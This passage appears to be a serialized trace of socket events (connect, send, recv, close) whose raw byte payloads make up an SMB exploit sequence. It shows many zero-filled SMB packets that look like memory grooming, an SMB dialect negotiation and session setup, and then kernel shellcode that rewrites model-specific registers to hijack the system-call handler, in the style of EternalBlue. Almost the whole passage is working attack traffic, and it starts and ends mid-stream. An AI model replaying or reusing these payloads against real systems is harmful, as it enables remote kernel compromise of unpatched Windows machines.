b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 7, 0.0)\", \"('connect', 8, 0.0)\", \"('send', 7, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 9, 0.0)\", \"('connect', 10, 0.0)\", \"('send', 9, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 11, 0.0)\", \"('connect', 12, 0.0)\", \"('send', 11, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 13, 0.0)\", \"('send', 12, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 14, 0.0)\", \"('send', 13, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 15, 0.0)\", \"('send', 14, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 16, 0.0)\", \"('send', 15, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 16, 
b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00,\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf8\\\\x87\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('close', 2, 0.0)\", \"('connect', 17, 0.0)\", \"('send', 17, 
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 5, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\